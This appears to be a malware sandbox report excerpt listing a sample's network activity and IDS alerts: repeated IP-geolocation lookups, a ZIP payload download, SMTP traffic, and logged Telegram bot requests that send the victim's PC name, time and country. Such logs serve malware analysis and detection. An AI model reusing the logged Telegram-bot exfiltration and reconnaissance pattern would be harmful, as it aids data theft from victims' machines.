Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49746 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49752 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49750 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.10:49753 -> 199.188.200.59:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2012/03/2025%20/%2011:45:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2012/03/2025%20/%2011:56:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2012/03/2025%20/%2014:59:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 13.107.253.67 13.107.253.67
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 149.137.128.16 149.137.128.16
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49715 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49754 -> 13.107.253.67:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49705 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49699 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49717 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49710 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49701 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49758 -> 13.107.253.67:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49757 -> 13.107.253.67:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49692 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49702 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49706 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49708 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49707 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49751 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49714 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49748 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49712 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49745 -> 104.21.112.1:443

Source: global traffic

TCP traffic: 192.168.2.10:49753 -> 199.188.200.59:587

Source: global traffic	HTTP traffic detected: GET /file/mdocument/PO202502SNAKWS.zip HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f004.backblazeb2.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49700 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49704 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /file/mdocument/PO202502SNAKWS.zip HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f004.backblazeb2.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2012/03/2025%20/%2011:45:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2012/03/2025%20/%2011:56:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2012/03/2025%20/%2014:59:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
